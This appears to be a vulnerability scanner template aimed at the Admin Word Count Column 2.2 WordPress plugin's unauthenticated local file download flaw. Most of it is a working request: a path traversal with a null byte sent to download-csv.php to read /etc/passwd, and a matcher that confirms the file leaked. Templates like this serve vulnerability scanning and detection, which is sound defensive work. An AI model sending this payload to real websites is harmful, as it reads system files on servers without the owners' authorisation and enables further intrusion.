id: admin-word-count-column-lfi info: name: Admin word count column 2.2 - Unauthenticated Local File Download author: daffainfo,Splint3r7 severity: high reference: - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html - https://wordpress.org/plugins/admin-word-count-column/ tags: wordpress,wp-plugin,lfi,wp requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0' matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200